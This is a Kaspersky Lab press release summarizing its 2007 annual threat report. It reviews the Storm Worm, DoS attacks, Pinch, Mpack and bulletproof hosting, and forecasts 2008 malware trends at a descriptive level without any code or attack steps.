Threat evolution-2007: the death of "non-profit" malicious software. Kaspersky Security Bulletin 2007

Kaspersky Lab, a leading developer of secure content management solutions, announces the publication of its annual report, Kaspersky Security Bulletin 2007. The Evolution of Threats in 2007, on Viruslist.com. The report was prepared by the company’s leading experts.

Kaspersky Lab’s annual report analyzes the most important changes in malware development trends. This is the first annual report to make use of a new methodology for processing statistical data. This report is intended for IT security professionals, as well as all users interested in computer virology.

2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world.

Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache.

Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds).

DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded as the first instance of cyber-warfare by many experts. Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs.

In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order with technical support provided to customers. A good example of business organized along these lines is Pinch, a Trojan program. Its authors developed more than 4,000 custom variants in several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia’s Federal Security Services, announced that the Trojan’s authors had been arrested.

Looking at the year’s results from the quantitative point of view, a hands-down victory was won by game Trojans, which are designed to steal data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data.

Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious.

These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.

Forecasts

1. Malware 2.0

The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected.

The model has the following main features:

• A network of infected computers is not centrally controlled.
• The malware actively resists third-party attempts to analyze its malicious activity and take control of it.
• Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time.
• Social engineering methods are skillfully used.
• Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity.
• Different functions are performed by different modules (instead of the all-in-one design).

The new generation of malicious programs can be regarded as Malware 2.0. These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.

2. Rootkits and “bootkits”

Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector (programs that do this are called bootkits). This is a reincarnation of an old technique, which allows a malicious program to take control before the operating system (and antivirus software) fully boots. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.

3. File viruses

File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method.

In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.

4. Attacks targeting social networks

In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpaces, Livejournal, Blogger etc. will be in demand among cybercriminals. This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through accounts of social network users, via their weblogs and profiles.

XSS / PHP / SQL attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in Web 2.0 services. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists to conduct further attacks involving “traditional” methods.

5. Mobile threats

As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as they promised in late 2007.

The complete version of the Kaspersky Lab annual report, Kaspersky Security Bulletin 2007. The evolution of threats in 2007, is available on Viruslist.com.